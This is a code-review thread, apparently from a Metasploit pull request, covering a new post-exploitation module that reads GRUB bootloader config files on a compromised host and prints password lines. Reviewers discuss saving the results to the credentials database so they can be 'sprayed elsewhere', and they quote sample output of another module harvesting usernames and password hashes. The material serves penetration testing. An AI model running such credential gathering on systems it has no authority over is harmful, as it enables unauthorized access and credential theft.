modules/post/multi/gather/grub_password.rb

```diff
@@ -0,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Gather GRUB Password',
+      'Description'  => %q{
+        This module gathers GRUB passwords from GRUB bootloader config files.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Garvit Dewan <d.garvit[at]gmail.com>' # @dgarvit
+        ],
+      'Platform'     => ['linux', 'osx', 'unix', 'solaris', 'bsd'],
+      'SessionTypes' => ['meterpreter', 'shell'],
+      'References'   => [
+        ['URL', 'https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption']
+      ]
+    ))
+  end
+
+  def run
+    targets = [
+      '/boot/grub/grub.conf',
+      '/boot/grub/grub.cfg',
+      '/etc/grub.conf',
+      '/etc/grub/grub.cfg',
+      '/etc/grub.d/00_header',
+      '/mnt/sysimage/boot/grub.conf',
+      '/mnt/boot/grub/grub.conf',
+      '/rpool/boot/grub/grub.cfg',
+      '/boot/grub2/grub.cfg'
+    ]
+
+    print_status("Searching for GRUB config files..")
+    file_found = false
+    targets.each do |target|
+      next unless readable?(target)
+      file_found = true
+      print_status("Reading #{target}")
+      file = read_file(target)
+      password_found = false
+      file.each_line do |line|
+        line = line.strip
+        if line.start_with?("password")
+          print_good("Found password: #{line}")
```

Comment:
Would be good to add the credit to the database as well.

Reply:
Database as in, the name of the file from which the password was gathered?

Reply:
You could `store_loot` for the file, but then `store_creds` or `create_creds` (forgot which it is) to store the password as well

Reply:
Done! By the way, it was `create_credential` :)

Reply:
Storing credentials in the database should only be performed if the credentials are parsed appropriately.

Parsing the grub config is [not as simple as splitting by whitespace](https://github.com/rapid7/metasploit-framework/issues/11166#issue-393778946). For this reason, the lazy option of simply matching and printing every line beginning with `/password/i` is far easier.

However, if you want to research GRUB and its various configuration formats, it would be a good learning opportunity, and would make for a far more usable msf module, as creds stored in the database can be sprayed elsewhere :)

Also, `private_type: :password` is reserved for instances where the clear text password is stored. [GRUB passwords can be hashed](https://www.gnu.org/software/grub/manual/grub/html_node/password_005fpbkdf2.html) or [encrypted](https://github.com/rapid7/metasploit-framework/issues/11166#issue-393778946), in which case `private_type: :nonreplayable_hash` is appropriate.

Reply:
You are right, I was faced with the same challenge. I'll research GRUB for various configuration formats!

Reply:
Awesome. This is why I created issue #11166 instead of doing it myself - so parsing can be someone else's problem :P

Also, if you go that route, then a better approach exists for your loop.

Instead of shoving everything in a loop and using a `found` variable, then relying upon it at the end, you can instead build up a `Hash` of credentials (`[username]` / `<private>` / `<private_type>`). Then, once all files have been parsed, you can iterate through the `Hash`, storing each credential in the database, and building a pretty table for output to console.

You can find some examples of this code pattern with:

```
grep -rn "cred_table" modules/
```

Here's an [example](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/scanner/http/surgenews_user_creds.rb).

And [here's](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/surgenews_user_creds.md) some pretty example output which may help with motivation:

  ```
  msf > use auxiliary/scanner/http/surgenews_user_creds 
  msf auxiliary(surgenews_user_creds) > set rhosts 172.16.191.133 172.16.191.166
  rhosts => 172.16.191.133 172.16.191.166
  msf auxiliary(surgenews_user_creds) > run

  [+] Found administrator credentials (admin:admin)

  SurgeNews User Credentials
  ==========================

   Username   Password  Password Hash                           Admin
   --------   --------  -------------                           -----
   admin      admin                                             true
   qwerty@bt            {ssha}BuFLjIFUUSy1IltX3AuN420qV2ZFU7EL  false
   user@bt              {ssha}HFTkDsnNlLiaHN+sIS9VQarVGGXmYISn  false

  [+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.133_surgenews.user.c_633569.txt
  [*] Scanned 1 of 2 hosts (50% complete)
  [+] Found administrator credentials (test:test)
  [+] Found user credentials (zxcv@win-sgbsd5tqutq:zxcv)

  SurgeNews User Credentials
  ==========================

   Username              Password  Password Hash                           Admin
   --------              --------  -------------                           -----
   asdf@win-sgbsd5tqutq            {ssha}8ytixKjxf3kaBc6T471R1Re/C8MUnKnF  false
   test                  test                                              true
   test@win-sgbsd5tqutq            {ssha}Vw8EkFxAJuiZrb98Fz+sdr/yEEmBZ2Jc  false
   test@win-sgbsd5tqutq            {ssha}j4teSf4CgA3+XVRJscFHyqoOQJRoLg4K  false
   zxcv@win-sgbsd5tqutq  zxcv                                              false

  [+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.166_surgenews.user.c_077983.txt
  [*] Scanned 2 of 2 hosts (100% complete)
  [*] Auxiliary module execution completed
  ```